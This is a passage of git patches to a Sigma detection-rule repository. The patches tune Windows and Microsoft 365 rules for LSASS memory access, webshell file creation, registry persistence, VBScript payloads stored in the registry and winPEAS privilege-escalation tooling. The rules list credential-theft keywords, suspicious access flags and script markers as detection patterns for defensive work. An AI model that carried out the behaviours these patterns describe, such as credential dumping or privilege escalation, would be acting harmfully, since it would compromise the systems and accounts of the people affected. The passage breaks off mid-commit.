experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/08/13 +modified: 2022/09/18 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -92,6 +92,9 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + filter_xampp: + SourceImage|endswith: '\xampp-control.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User From 1c4a73f123cd584f0f43fff57086f0aff2693e4f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 12:56:52 +0200 Subject: [PATCH 053/120] fix: FP with PS ISE --- .../image_load/image_load_wsman_provider_image_load.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_wsman_provider_image_load.yml b/rules/windows/image_load/image_load_wsman_provider_image_load.yml index 1ce9ae1f7..846ebbbbb 100644 --- a/rules/windows/image_load/image_load_wsman_provider_image_load.yml +++ b/rules/windows/image_load/image_load_wsman_provider_image_load.yml @@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. status: experimental date: 2020/06/24 -modified: 2022/07/18 +modified: 2022/09/18 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -55,6 +55,8 @@ detection: Image|startswith: 'C:\Windows\Temp\asgard2-agent\' filter_citrix: Image|startswith: 'C:\Program Files\Citrix\' + filter_ps_ise: + Image|endswith: '\powershell_ise.exe' svchost: Image|endswith: '\svchost.exe' commandline_null: From 17e9b5ee31390541f306777b9fb9d44835606d01 Mon Sep 17 00:00:00 2001 From: Arturo <101707527+amjcyber@users.noreply.github.com> Date: Sun, 18 Sep 2022 15:38:54 +0200 Subject: [PATCH 054/120] Update win_impacket_psexec.yml Based on recent tests, the original RelativeTargetName from this rule are not accurate. The last "t" from each selection must be deleted in order to detect the predefined impacket psexec behavior. --- rules/windows/builtin/security/win_impacket_psexec.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index 036a3b101..ff7856880 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -16,9 +16,9 @@ detection: EventID: 5145 ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$ RelativeTargetName|contains: - - 'RemCom_stdint' - - 'RemCom_stdoutt' - - 'RemCom_stderrt' + - 'RemCom_stdin' + - 'RemCom_stdout' + - 'RemCom_stderr' condition: selection1 falsepositives: - Unknown From bf660b2de26c9f50aa7b5f4ab424d536fa2fd480 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:21:05 +0200 Subject: [PATCH 055/120] fix: FPs (testing, and Windows 2022 test system) --- .../win_scm_database_privileged_operation.yml | 4 ++-- ...ile_event_win_webshell_creation_detect.yml | 21 ++++++++----------- ..._win_shell_write_susp_files_extensions.yml | 3 ++- ...ion_win_ntfs_short_name_path_use_image.yml | 13 +++++++++--- ...creation_win_ntfs_short_name_use_image.yml | 6 ++++-- .../proc_creation_win_susp_gup_execution.yml | 7 ++++++- ...c_creation_win_susp_regsvr32_anomalies.yml | 4 +++- ..._creation_win_susp_schtasks_env_folder.yml | 6 ++++-- .../registry_event_susp_atbroker_change.yml | 8 +++---- .../registry_set_add_port_monitor.yml | 9 +++++++- ...gistry_set_disable_autologger_sessions.yml | 5 ++++- .../registry_set_new_network_provider.yml | 5 ++++- 12 files changed, 60 insertions(+), 31 deletions(-) diff --git a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml index ed9b84694..7141e95ce 100644 --- a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml @@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton references: - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html date: 2019/08/15 -modified: 2022/06/30 +modified: 2022/09/18 logsource: product: windows service: security @@ -22,7 +22,7 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: medium tags: - attack.privilege_escalation - attack.t1548 diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index eda1ef802..ba9948640 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton references: - PT ESC rule and personal experience date: 2019/10/22 -modified: 2022/05/24 +modified: 2022/09/18 logsource: product: windows category: file_event detection: - selection_2: + selection_wwwroot: TargetFilename|contains: '\inetpub\wwwroot\' - selection_3: + selection_ext1: TargetFilename|contains: - '.asp' - '.ashx' - '.ph' - selection_4: + selection_static: TargetFilename|contains: - '\www\' - '\htdocs\' - '\html\' - selection_5: + selection_ext2: TargetFilename|contains: '.ph' - selection_6: - - TargetFilename|endswith: '.jsp' - - TargetFilename|contains|all: - - '\cgi-bin\' - - '.pl' false_positive1: # false positives when unpacking some executables in $TEMP TargetFilename|contains: - '\AppData\Local\Temp\' - '\Windows\Temp\' - false_positive2: + false_positive_system: Image: 'System' # fp : backup/restore from drivers - condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) ) + false_positive_legitimate: + TargetFilename|comntains: '\xampp' + condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder level: high diff --git a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml index 5eb617acc..d3a27df93 100644 --- a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml @@ -9,6 +9,7 @@ references: - Internal Research author: Nasreddine Bencherchali date: 2022/08/12 +modified: 2022/09/18 logsource: category: file_event product: windows @@ -17,7 +18,7 @@ detection: Image|endswith: - '\rundll32.exe' #- '\svchost.exe' # Might generate some FP - - '\dllhost.exe' + #- '\dllhost.exe' # Too many FPs - '\smss.exe' - '\RuntimeBroker.exe' - '\sihost.exe' diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml index dae3b3927..67657f150 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/22 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -20,7 +20,7 @@ detection: Image|contains: - '~1\' - '~2\' - filter: + filter1: - ParentImage: - C:\Windows\System32\Dism.exe - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) @@ -30,7 +30,14 @@ detection: - Product: 'InstallShield (R)' - Description: 'InstallShield (R) Setup Engine' - Company: 'InstallShield Software Corporation' - condition: selection and not filter + filter_installers: + - Image|contains|all: + - '\AppData\' + - '\Temp\' + - Image|endswith: + - '~1\unzip.exe' + - '~1\7zG.exe' + condition: selection and not 1 of filter* falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: high diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml index fceefa59e..4c53992f1 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/06 -modified: 2022/08/12 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -37,9 +37,11 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '-installer.exe' # e.g. C:\Users\neo\Downloads\xampp-windows-x64-8.1.6-0-VS16-installer.exe + - Image|contains: '\vcredi' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..b2d7e89af 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -16,7 +17,11 @@ detection: filter: Image|endswith: '\explorer.exe' CommandLine|contains: '\Notepad++\notepad++.exe' - condition: selection and not filter + filter_parent: + ParentImage|contains: '\Notepad++\updater\' + filter_null: + CommandLine: null + condition: selection and not 1 of filter* falsepositives: - Other parent binaries using GUP not currently identified level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index c86ba586d..7cb98a4f5 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/07/20 +modified: 2022/09/18 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -73,6 +73,8 @@ detection: filter2: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' + filter_legitimate: + CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml index 831dc9d60..f2bea0cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml @@ -10,7 +10,7 @@ tags: - attack.t1053.005 author: Florian Roth date: 2022/02/21 -modified: 2022/07/28 +modified: 2022/09/18 logsource: product: windows category: process_creation @@ -36,7 +36,9 @@ detection: - 'C:\Windows\Temp' - 'C:\Perflogs' filter_mixed: - - CommandLine|contains: 'update_task.xml' + - CommandLine|contains: + - 'update_task.xml' + - '/Create /TN TVInstallRestore /TR' - ParentCommandLine|contains: 'unattended.ini' condition: ( all of selection1* or all of selection2* ) and not 1 of filter* falsepositives: diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index fc1844066..23cc3a56b 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs +description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2021/05/24 +modified: 2022/09/18 tags: - attack.defense_evasion - attack.t1218 @@ -23,5 +23,5 @@ detection: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' condition: selection falsepositives: - - Creation of non-default, legitimate AT. -level: high + - Creation of non-default, legitimate at usage +level: medium diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index cb1c122ea..069f95d0f 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -5,7 +5,7 @@ description: | A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. author: frack113 date: 2021/12/30 -modified: 2022/03/26 +modified: 2022/09/18 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md @@ -24,6 +24,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_leg1: + TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' + filter_leg2: + TargetObject|contains|all: + - 'Control\Print\Environments\'' + - '\Drivers\' + - '\VNC Printer' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml index 5caf99e9d..72d5abdd5 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ date: 2022/08/01 +modified: 2022/09/18 logsource: category: registry_set product: windows @@ -22,7 +23,9 @@ detection: - '\Enabled' - '\Start' Details: DWORD (0x00000000) - condition: all of selection* + filter_legitimate: + Image: 'C:\Windows\system32\wevtutil.exe' + condition: all of selection* and not 1 of filter* falsepositives: - Unknown level: high diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index 49a746ff1..b356a4de5 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -6,6 +6,7 @@ related: description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it author: Nasreddine Bencherchali date: 2022/08/23 +modified: 2022/09/18 status: experimental references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade @@ -25,7 +26,9 @@ detection: - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' #- '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV - condition: selection and not filter + filter_valid_procs: + Image: C:\Windows\System32\poqexec.exe + condition: selection and not 1 of filter* falsepositives: - Other legitimate network providers used and not filtred in this rule level: high From b052302ac04eeec0220a03ea7f399946c067aa56 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:24:07 +0200 Subject: [PATCH 056/120] fix: syntax error --- .../registry/registry_set/registry_set_add_port_monitor.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index 069f95d0f..5b66ed84b 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -28,7 +28,7 @@ detection: TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' filter_leg2: TargetObject|contains|all: - - 'Control\Print\Environments\'' + - 'Control\Print\Environments\' - '\Drivers\' - '\VNC Printer' condition: selection and not 1 of filter_* From 6161fb91b311694fcf0dad7c3ec13938e92b122b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:33:49 +0200 Subject: [PATCH 057/120] fix: typo in modifier --- .../file_event/file_event_win_webshell_creation_detect.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index ba9948640..5d246108f 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -32,7 +32,7 @@ detection: false_positive_system: Image: 'System' # fp : backup/restore from drivers false_positive_legitimate: - TargetFilename|comntains: '\xampp' + TargetFilename|contains: '\xampp' condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder From 2a94527714d4f7cbf7ceba6028fab3f3fa9cf55f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 19 Sep 2022 09:23:15 +0200 Subject: [PATCH 058/120] fix: FP with VBScript in registry key rule --- .../registry_set_vbs_payload_stored.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 049dc3869..935988c83 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -3,7 +3,7 @@ id: 46490193-1b22-4c29-bdd6-5bf63907216f description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group status: experimental date: 2021/03/05 -modified: 2022/03/26 +modified: 2022/09/19 author: Florian Roth references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ @@ -14,14 +14,13 @@ detection: selection: EventType: SetValue TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion' - Details|contains: - - 'vbscript' - - 'jscript' - - 'mshtml' + Details|contains: + - 'vbscript:' + - 'jscript:' + - 'mshtml,' - 'RunHTMLApplication' - 'Execute(' - 'CreateObject' - - 'RegRead' - 'window.close' filter: TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Run' @@ -31,8 +30,7 @@ detection: Details|contains: - '\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll' - '<\Microsoft.mshtml,fileVersion=' - - 'FL_Microsoft_mshtml_dll_____X86.' - - 'Microsoft_mshtml_dll_1_____X86.' + - '_mshtml_dll_' - '<\Microsoft.mshtml,culture=' condition: selection and not 1 of filter* falsepositives: From 633037e3ccc8dd4335f74872cffe20780c148b5c Mon Sep 17 00:00:00 2001 From: Feathers <93973834+ionsor@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:19:55 +0200 Subject: [PATCH 059/120] Create microsoft365_pst_export_alert.yml (#2665) --- .../m365/microsoft365_pst_export_alert.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_pst_export_alert.yml diff --git a/rules/cloud/m365/microsoft365_pst_export_alert.yml b/rules/cloud/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..a9950ae28 --- /dev/null +++ b/rules/cloud/m365/microsoft365_pst_export_alert.yml @@ -0,0 +1,23 @@ +title: PST Export Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +author: 'Sorina Ionescu' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1114/ +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium +tags: + - attack.collection + - attack.t1114 From a36724ffdf1baf74720fd66d3509db2ce4bf752d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Mon, 19 Sep 2022 11:27:17 +0200 Subject: [PATCH 060/120] fix: FP found in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 452485411..462cceb32 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/08 +modified: 2022/09/19 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -27,6 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From 52eae2c92b29eb121e7e59ecf9158d8d956cbb04 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 20:25:18 +0200 Subject: [PATCH 061/120] new rule for winpeas tool --- ...c_creation_detect_execution_of_winPEAS.yml | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml new file mode 100644 index 000000000..5ef086252 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml @@ -0,0 +1,57 @@ +title: Detect Execution of winPEAS +id: 98b53e78-ebaf-46f8-be06-421aafd176d9 +status: experimental +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +author: Georg Lauenstein +date: 2022/09/19 +references: + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation +tags: + - attack.privilege_escalation + - attack.t1082 + - attack.t1087 + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: + - '\winPEASany.exe' + - '\winPEASany_ofs.exe' + - '\winPEASx64.exe' + - '\winPEASx64_ofs.exe' + - '\winPEASx86.exe' + - '\winPEASx86_ofs.exe' + - OriginalFileName: + - 'winPEAS.exe' # always the same + selection_cmd_args: + - CommandLine|contains: + - 'domain' # Enumerate domain information + - 'systeminfo' # Search system information + - 'userinfo' # Search user information + - 'processinfo' # Search processes information + - 'serviceinfo' # Search services information + - 'applicationsinfo' # Search installed applications information + - 'networkinfo' # Search network information + - 'windowscreds' # Search windows credentials + - 'browserinfo ' # Search browser information + - 'filesinfo ' # Search generic files that can contains credentials + - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - 'eventsinfo' # Display interesting events information + filter_sysinfo: + - Image|endswith: + - '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: + - 'sysinfo.exe' + condition: (selection_img or selection_cmd_args) and not filter_sysinfo +fields: + - Image + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory +falsepositives: + - Pentesting +level: high From 44a49914190ed714da6685442af6c7b0baa92af6 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:00:59 +0200 Subject: [PATCH 062/120] Update and rename proc_creation_detect_execution_of_winPEAS.yml to proc_creation_win_winpeas_tool.yml --- ...cution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_detect_execution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} (98%) diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml similarity index 98% rename from rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml rename to rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 5ef086252..d093f55aa 100644 --- a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -1,4 +1,4 @@ -title: Detect Execution of winPEAS +title: Detect Execution of winPEAS id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz From d8e806cf93e82ce0dc5ea5e92e29089c68659d40 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:17:32 +0200 Subject: [PATCH 063/120] Update falsepositives and format --- .../proc_creation_win_winpeas_tool.yml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d093f55aa..92378f6ca 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -24,8 +24,7 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: - - 'winPEAS.exe' # always the same + - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - 'domain' # Enumerate domain information @@ -41,10 +40,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: - - '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: - - 'sysinfo.exe' + - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: 'sysinfo.exe' condition: (selection_img or selection_cmd_args) and not filter_sysinfo fields: - Image @@ -53,5 +50,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Pentesting + - Should not be any as administrators do not use this tool level: high From 86a4f24ce8b085105c768b8f24ca6257669bfce0 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 22:36:18 +0200 Subject: [PATCH 064/120] del "domain" under CommandLine --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 92378f6ca..cc52a318a 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -27,7 +27,6 @@ detection: - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - - 'domain' # Enumerate domain information - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information From 9bfd2c729fb9ba4c1261d8407a44266436ae2b1d Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:00:02 +0200 Subject: [PATCH 065/120] change condition and format --- .../process_creation/proc_creation_win_winpeas_tool.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index cc52a318a..d591a8b10 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - selection_img: + winpeas_basic: - Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same - selection_cmd_args: + winpeas_option: - CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information @@ -41,7 +41,7 @@ detection: filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' - condition: (selection_img or selection_cmd_args) and not filter_sysinfo + condition: 1 of winpeas_* and not filter_sysinfo fields: - Image - User From 9e589736c2d2e7c106ca6cc7560f942a9e5d7170 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 